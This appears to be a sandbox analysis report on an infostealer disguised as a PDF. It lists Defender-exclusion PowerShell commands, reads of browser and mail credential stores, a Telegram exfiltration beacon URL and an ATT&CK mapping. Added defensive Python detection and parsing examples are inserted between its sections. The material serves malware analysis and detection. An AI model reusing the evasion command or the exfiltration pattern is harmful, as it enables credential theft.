                Source: pre-stowage.PDF.scr.exe, 00000004.00000002.3767191739.0000000003A12000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Canara Transaction PasswordVMware20,11696492231x
                Source: pre-stowage.PDF.scr.exe, 00000004.00000002.3767191739.0000000003A12000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Interactive Brokers - HKVMware20,11696492231]
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information queried: ProcessInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process token adjusted: Debug
                Source: C:\Users\user\Desktop\pre-stowage.PDF.scr.exe | Process token adjusted: Debug
                Source: C:\Users\user\Desktop\pre-stowage.PDF.scr.exe | Memory allocated: page read and write | page guard

                HIPS / PFW / Operating System Protection Evasion

Source: C:\Users\user\Desktop\pre-stowage.PDF.scr.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\pre-stowage.PDF.scr.exe" (listed twice)
Source: C:\Users\user\Desktop\pre-stowage.PDF.scr.exe | Memory written: C:\Users\user\Desktop\pre-stowage.PDF.scr.exe base: 400000 value starts with: 4D5A
Source: C:\Users\user\Desktop\pre-stowage.PDF.scr.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\pre-stowage.PDF.scr.exe"
Source: C:\Users\user\Desktop\pre-stowage.PDF.scr.exe | Process created: C:\Users\user\Desktop\pre-stowage.PDF.scr.exe "C:\Users\user\Desktop\pre-stowage.PDF.scr.exe"
Source: C:\Users\user\Desktop\pre-stowage.PDF.scr.exe | Queries volume information: C:\Users\user\Desktop\pre-stowage.PDF.scr.exe VolumeInformation
Source: C:\Users\user\Desktop\pre-stowage.PDF.scr.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\Desktop\pre-stowage.PDF.scr.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Users\user\Desktop\pre-stowage.PDF.scr.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Users\user\Desktop\pre-stowage.PDF.scr.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
Source: C:\Users\user\Desktop\pre-stowage.PDF.scr.exe | Queries volume information: C:\Windows\Fonts\MTCORSVA.TTF VolumeInformation
Source: C:\Users\user\Desktop\pre-stowage.PDF.scr.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation (listed twice)
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation (listed three times)
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation (listed twice)
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation (listed seven times)
Source: C:\Users\user\Desktop\pre-stowage.PDF.scr.exe | Queries volume information: C:\Users\user\Desktop\pre-stowage.PDF.scr.exe VolumeInformation
Source: C:\Users\user\Desktop\pre-stowage.PDF.scr.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\Desktop\pre-stowage.PDF.scr.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Users\user\Desktop\pre-stowage.PDF.scr.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Users\user\Desktop\pre-stowage.PDF.scr.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation
Source: C:\Users\user\Desktop\pre-stowage.PDF.scr.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
Source: C:\Users\user\Desktop\pre-stowage.PDF.scr.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
Source: C:\Users\user\Desktop\pre-stowage.PDF.scr.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

                Lowering of HIPS / PFW / Operating System Security Settings

Source: C:\Users\user\Desktop\pre-stowage.PDF.scr.exe | Registry value created: DisableTaskMgr 1
Source: C:\Users\user\Desktop\pre-stowage.PDF.scr.exe | Registry key created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System DisableTaskMgr

                Stealing of Sensitive Information

Source: Yara match | File source: 00000004.00000002.3764112977.0000000002931000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0.2.pre-stowage.PDF.scr.exe.4bd6388.1.unpack, type: UNPACKEDPE
Source: Yara match | File source: 4.2.pre-stowage.PDF.scr.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.pre-stowage.PDF.scr.exe.4bd6388.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.pre-stowage.PDF.scr.exe.4b4ed68.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.pre-stowage.PDF.scr.exe.4ac7748.3.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000004.00000002.3762230875.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.1320251868.0000000004894000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: pre-stowage.PDF.scr.exe PID: 7128, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: pre-stowage.PDF.scr.exe PID: 6896, type: MEMORYSTR

Source: Yara match | File source: 0.2.pre-stowage.PDF.scr.exe.4bd6388.1.unpack, type: UNPACKEDPE
Source: Yara match | File source: 4.2.pre-stowage.PDF.scr.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.pre-stowage.PDF.scr.exe.4bd6388.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.pre-stowage.PDF.scr.exe.4b4ed68.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.pre-stowage.PDF.scr.exe.4ac7748.3.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000004.00000002.3762230875.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.1320251868.0000000004894000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: pre-stowage.PDF.scr.exe PID: 7128, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: pre-stowage.PDF.scr.exe PID: 6896, type: MEMORYSTR

Source: C:\Users\user\Desktop\pre-stowage.PDF.scr.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
Source: C:\Users\user\Desktop\pre-stowage.PDF.scr.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
Source: C:\Users\user\Desktop\pre-stowage.PDF.scr.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Users\user\Desktop\pre-stowage.PDF.scr.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Top Sites
Source: C:\Users\user\Desktop\pre-stowage.PDF.scr.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
Source: C:\Users\user\Desktop\pre-stowage.PDF.scr.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History
Source: C:\Users\user\Desktop\pre-stowage.PDF.scr.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
Source: C:\Users\user\Desktop\pre-stowage.PDF.scr.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
Source: C:\Users\user\Desktop\pre-stowage.PDF.scr.exe | File opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\
Source: C:\Users\user\Desktop\pre-stowage.PDF.scr.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676

Source: Yara match | File source: 0.2.pre-stowage.PDF.scr.exe.4bd6388.1.unpack, type: UNPACKEDPE
Source: Yara match | File source: 4.2.pre-stowage.PDF.scr.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.pre-stowage.PDF.scr.exe.4bd6388.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.pre-stowage.PDF.scr.exe.4b4ed68.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.pre-stowage.PDF.scr.exe.4ac7748.3.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000004.00000002.3762230875.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.1320251868.0000000004894000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: pre-stowage.PDF.scr.exe PID: 7128, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: pre-stowage.PDF.scr.exe PID: 6896, type: MEMORYSTR
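The three behaviours recorded under the headings above (the Add-MpPreference exclusion spawned through PowerShell, the DisableTaskMgr policy value, and the reads of the Chrome, Edge and Postbox profile stores) are the events a detection engineer would want to catch on a live host. The following is an added example, not code from the Joe Sandbox report, and it runs over constructed events rather than real telemetry: the ProcessCreate and RegistrySet events reuse the field names of Sysmon event IDs 1 and 13, the FileOpen event stands in for an EDR file-read event (Sysmon does not record file reads), and the rule names, severities and the Finding type are choices made for the example. One detail to carry into a real rule: the command line names the System32 PowerShell but the process image is the SysWOW64 copy, because the 32-bit sample is subject to WOW64 file-system redirection, so match on the image name rather than its directory.

```python
"""Added example, not part of the Joe Sandbox report: triage rules for the
behaviours the report records, run over constructed endpoint events."""
import re
from collections import defaultdict
from dataclasses import dataclass

# A document/image extension followed (possibly via more extensions) by an executable one.
DOUBLE_EXT_RE = re.compile(
    r"\.(pdf|docx?|xlsx?|pptx?|jpe?g|png|txt)(\.\w{1,4})*?\.(exe|scr|com|pif|bat|cmd)$", re.I)
# Add-MpPreference / Set-MpPreference carrying any exclusion parameter.
MPPREF_RE = re.compile(
    r"\b(add|set)-mppreference\b[^\n]*-exclusion(path|process|extension|ipaddress)\b", re.I)
# "1" or "DWORD (0x00000001)" style registry data.
DWORD_ONE_RE = re.compile(r"(0x0*1|\b1)\)?$")
# Browser and mail profile stores the sample opened (paths as in the report).
CRED_DIRS = ("\\google\\chrome\\user data\\", "\\microsoft\\edge\\user data\\",
             "\\postboxapp\\profiles\\")
CRED_FILES = ("login data", "cookies", "web data", "history")


@dataclass
class Finding:
    rule: str
    severity: str
    process: str   # image path the finding is attributed to
    detail: str


def check_event(ev):
    """Return the findings for a single event (possibly none)."""
    out = []
    if ev["Type"] == "ProcessCreate":
        image, cmd, parent = ev["Image"], ev["CommandLine"], ev["ParentImage"]
        if DOUBLE_EXT_RE.search(image):
            out.append(Finding("double_extension_masquerade", "medium", image, image))
        if image.lower().endswith("powershell.exe") and MPPREF_RE.search(cmd):
            # Attribute the exclusion to the parent: that is the process being protected.
            out.append(Finding("defender_exclusion_added", "high", parent, cmd))
        if parent.lower() == image.lower() and DOUBLE_EXT_RE.search(image):
            # A binary re-launching itself is the usual setup for PE injection / hollowing.
            out.append(Finding("self_spawn_for_injection", "medium", image, cmd))
    elif ev["Type"] == "RegistrySet":
        target = ev["TargetObject"]
        if (target.lower().endswith("\\policies\\system\\disabletaskmgr")
                and DWORD_ONE_RE.search(ev["Details"])):
            out.append(Finding("taskmgr_disabled", "high", ev["Image"], target))
    elif ev["Type"] == "FileOpen":
        path = ev["TargetFilename"].lower()
        if any(d in path for d in CRED_DIRS) and path.rsplit("\\", 1)[-1] in CRED_FILES:
            # Browsers open their own stores; any other reader is suspect.
            if not ev["Image"].lower().endswith(("chrome.exe", "msedge.exe")):
                out.append(Finding("credential_store_read", "high", ev["Image"],
                                   ev["TargetFilename"]))
    return out


def triage(events):
    """Run every rule, then correlate per process: one process that both tampers
    with defences and reads credential stores is reported as a stealer chain."""
    findings = [f for ev in events for f in check_event(ev)]
    rules_by_proc = defaultdict(set)
    for f in findings:
        rules_by_proc[f.process.lower()].add(f.rule)
    chains = [p for p, rules in rules_by_proc.items()
              if rules & {"defender_exclusion_added", "taskmgr_disabled"}
              and "credential_store_read" in rules]
    return findings, chains


# Constructed events mirroring the report's process tree (ordering and field values invented).
SAMPLE = r"C:\Users\user\Desktop\pre-stowage.PDF.scr.exe"
PS = r"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"
EVENTS = [
    {"Type": "ProcessCreate", "Image": SAMPLE, "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": f'"{SAMPLE}"'},
    {"Type": "ProcessCreate", "Image": PS, "ParentImage": SAMPLE,
     "CommandLine": f'"{PS}" Add-MpPreference -ExclusionPath "{SAMPLE}"'},
    {"Type": "ProcessCreate", "Image": SAMPLE, "ParentImage": SAMPLE,
     "CommandLine": f'"{SAMPLE}"'},
    {"Type": "RegistrySet", "Image": SAMPLE, "Details": "DWORD (0x00000001)",
     "TargetObject": r"HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\DisableTaskMgr"},
    {"Type": "FileOpen", "Image": SAMPLE,
     "TargetFilename": r"C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data"},
    {"Type": "FileOpen", "Image": r"C:\Program Files\Google\Chrome\Application\chrome.exe",
     "TargetFilename": r"C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data"},
]

if __name__ == "__main__":
    found, chains = triage(EVENTS)
    for f in found:
        print(f"[{f.severity}] {f.rule}: {f.detail}")
    print("stealer chains:", chains)
```

The correlation step matters more than any single rule: a Defender exclusion on its own is noisy on administrator workstations, and browsers legitimately open their own Login Data; the same non-browser process doing both, after a self-spawn, is what separates this sample from background activity.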

                Remote Access Functionality

Source: Yara match | File source: 00000004.00000002.3764112977.0000000002931000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0.2.pre-stowage.PDF.scr.exe.4bd6388.1.unpack, type: UNPACKEDPE
Source: Yara match | File source: 4.2.pre-stowage.PDF.scr.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.pre-stowage.PDF.scr.exe.4bd6388.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.pre-stowage.PDF.scr.exe.4b4ed68.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.pre-stowage.PDF.scr.exe.4ac7748.3.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000004.00000002.3762230875.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.1320251868.0000000004894000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: pre-stowage.PDF.scr.exe PID: 7128, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: pre-stowage.PDF.scr.exe PID: 6896, type: MEMORYSTR

Source: Yara match | File source: 0.2.pre-stowage.PDF.scr.exe.4bd6388.1.unpack, type: UNPACKEDPE
Source: Yara match | File source: 4.2.pre-stowage.PDF.scr.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.pre-stowage.PDF.scr.exe.4bd6388.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.pre-stowage.PDF.scr.exe.4b4ed68.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.pre-stowage.PDF.scr.exe.4ac7748.3.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000004.00000002.3762230875.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.1320251868.0000000004894000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: pre-stowage.PDF.scr.exe PID: 7128, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: pre-stowage.PDF.scr.exe PID: 6896, type: MEMORYSTR
MITRE ATT&CK Matrix

Only the cells the report marks with a signature-count badge are listed; the number in parentheses is that badge as extracted. All other cells of the matrix are the unpopulated template and carry no finding for this sample.

Persistence: DLL Side-Loading (1)
Privilege Escalation: Process Injection (111); DLL Side-Loading (1)
Defense Evasion: Masquerading (1); Disable or Modify Tools (31); Virtualization/Sandbox Evasion (31); Process Injection (111); Deobfuscate/Decode Files or Information (1); Obfuscated Files or Information (12); Software Packing (12); DLL Side-Loading (1)
Credential Access: OS Credential Dumping (1)
Discovery: Query Registry (1); Security Software Discovery (1); Process Discovery (1); Virtualization/Sandbox Evasion (31); Application Window Discovery (1); System Network Configuration Discovery (1); File and Directory Discovery (1); System Information Discovery (13)
Collection: Email Collection (1); Archive Collected Data (11); Data from Local System (1)
Command and Control: Web Service (1); Encrypted Channel (11); Ingress Tool Transfer (3); Non-Application Layer Protocol (3); Application Layer Protocol (14)
Reconnaissance, Resource Development, Initial Access, Execution, Lateral Movement, Exfiltration, Impact: no cells marked
Behavior Graph (ID 1576531; sample pre-stowage.PDF.scr.exe; start date 17/12/2024; architecture WINDOWS; score 100)

Contacted hosts: reallyfreegeoip.org (Tries to detect the country of the analysis system (by using the IP)); api.telegram.org (Uses the Telegram API (likely for C&C communication)); 2 other IPs or domains
Sample-level signatures: Found malware configuration; Malicious sample detected (through community Yara rule); Antivirus / Scanner detection for submitted sample; 12 other signatures

Process tree:
pre-stowage.PDF.scr.exe (initial process)
  signatures: Adds a directory exclusion to Windows Defender; Injects a PE file into a foreign processes
  +-- pre-stowage.PDF.scr.exe (second instance of the sample)
        network: api.telegram.org 149.154.167.220, 443, 49732, 49733 (TELEGRAMRU, United Kingdom); checkip.dyndns.com 193.122.130.0, 49702, 49713, 49715 (ORACLE-BMC-31898US, United States); reallyfreegeoip.org 172.67.177.134, 443, 49703, 49706 (CLOUDFLARENETUS, United States)
        signatures: Tries to steal Mail credentials (via file / registry access); Tries to harvest and steal browser information (history, passwords, etc); Disable Task Manager(disabletaskmgr); Disables the Windows task manager (taskmgr)
  +-- powershell.exe
        signatures: Loading BitLocker PowerShell Module
        +-- WmiPrvSE.exe
        +-- conhost.exe

Source | Detection | Scanner | Label
pre-stowage.PDF.scr.exe | 29% | ReversingLabs |
pre-stowage.PDF.scr.exe | 31% | Virustotal |
pre-stowage.PDF.scr.exe | 100% | Avira | HEUR/AGEN.1362915
pre-stowage.PDF.scr.exe | 100% | Joe Sandbox ML |
No Antivirus matches (the report's three further detection tables are empty)
Source | Detection | Scanner | Label
http://crl.micros4 | 0% | Avira URL Cloud | safe
Name | IP | Active | Malicious | Antivirus Detection | Reputation
reallyfreegeoip.org | 172.67.177.134 | true | false | | high
api.telegram.org | 149.154.167.220 | true | false | | high
checkip.dyndns.com | 193.122.130.0 | true | false | | high
checkip.dyndns.org | unknown | unknown | false | | high
Name | Malicious | Antivirus Detection | Reputation
https://reallyfreegeoip.org/xml/8.46.123.189 | false | | high
http://checkip.dyndns.org/ | false | | high
https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:849224%0D%0ADate%20and%20Time:%2018/12/2024%20/%2003:49:40%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20849224%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D | false | | high
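The sendMessage URL in the table above is the sample's first beacon: the victim's host name, local time and geolocated country are URL-encoded into the text parameter of a Telegram Bot API call. The parser below is an added example, not part of the report, that decodes that message into fields and applies the same check to a pair of constructed proxy-log lines. The bot token and chat_id are empty in the URL as the report shows it and are carried through unchanged, not guessed; the log-line format and the hunt() rule are choices made for the example.

```python
"""Added example, not part of the Joe Sandbox report: decode the Telegram Bot API
beacon recorded for this sample and hunt for the same shape in proxy logs."""
import re
from urllib.parse import urlparse, parse_qs

# Bot API paths look like /bot<token>/<method>; the token is empty in the report's URL.
BOT_PATH_RE = re.compile(r"^/bot([^/]*)/(\w+)$")


def parse_telegram_beacon(url):
    """Return None for anything that is not a Telegram Bot API call, otherwise a dict
    with the token, method, chat_id and the key/value lines found in the text parameter."""
    u = urlparse(url)
    if u.hostname != "api.telegram.org":
        return None
    m = BOT_PATH_RE.match(u.path)
    if not m:
        return None
    token, method = m.groups()
    q = parse_qs(u.query, keep_blank_values=True)
    text = q.get("text", [""])[0]
    fields = {}
    # The message is CRLF-separated "Key: value" lines; the bracketed trailer has no colon.
    for line in text.replace("\r\n", "\n").split("\n"):
        if ":" in line:
            key, value = line.split(":", 1)
            fields[key.strip()] = value.strip()
    return {"token": token, "method": method, "chat_id": q.get("chat_id", [""])[0],
            "fields": fields, "raw_text": text}


def hunt(log_lines):
    """Flag sendMessage calls whose text reads like a host inventory (any Key: value lines)."""
    hits = []
    for line in log_lines:
        for tok in line.split():
            if tok.startswith("http"):
                r = parse_telegram_beacon(tok)
                if r and r["method"] == "sendMessage" and r["fields"]:
                    hits.append(r)
    return hits


# The beacon URL exactly as the report lists it.
BEACON = ("https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:849224"
          "%0D%0ADate%20and%20Time:%2018/12/2024%20/%2003:49:40%0D%0ACountry%20Name:%20United%20States"
          "%0D%0A%5B%20849224%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean"
          "%20the%20system%20storage's%20empty.%20%5D")

# Constructed proxy log lines: "client method url status". The first is benign Telegram web use.
PROXY_LOG = [
    "10.0.0.5 GET https://web.telegram.org/a/ 200",
    f"10.0.0.5 GET {BEACON} 200",
]

if __name__ == "__main__":
    beacon = parse_telegram_beacon(BEACON)
    for k, v in beacon["fields"].items():
        print(f"{k}: {v}")
    print("hits in proxy log:", len(hunt(PROXY_LOG)))
```

For proxy hunting the useful signal is the path shape /bot<token>/sendMessage together with a text parameter that decodes to labelled host details; the token, when present, identifies the attacker's bot and can be reported to Telegram.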
Name | Source | Malicious | Antivirus Detection | Reputation
https://www.office.com/ | pre-stowage.PDF.scr.exe, 00000004.00000002.3764112977.0000000002AFB000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://duckduckgo.com/chrome_newtab | pre-stowage.PDF.scr.exe, 00000004.00000002.3767191739.0000000003951000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://duckduckgo.com/ac/?q= | pre-stowage.PDF.scr.exe, 00000004.00000002.3767191739.0000000003951000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://api.telegram.org | pre-stowage.PDF.scr.exe, 00000004.00000002.3764112977.0000000002A19000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://www.google.com/images/branding/product/ico/googleg_lodp.ico | pre-stowage.PDF.scr.exe, 00000004.00000002.3767191739.0000000003951000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://api.telegram.org/bot | pre-stowage.PDF.scr.exe, 00000000.00000002.1320251868.0000000004894000.00000004.00000800.00020000.00000000.sdmp; pre-stowage.PDF.scr.exe, 00000004.00000002.3762230875.0000000000402000.00000040.00000400.00020000.00000000.sdmp; pre-stowage.PDF.scr.exe, 00000004.00000002.3764112977.0000000002A19000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q= | pre-stowage.PDF.scr.exe, 00000004.00000002.3767191739.0000000003951000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://checkip.dyndns.org | pre-stowage.PDF.scr.exe, 00000004.00000002.3764112977.0000000002931000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command= | pre-stowage.PDF.scr.exe, 00000004.00000002.3767191739.0000000003951000.00000004.00000800.00020000.00000000.sdmp | false | | high
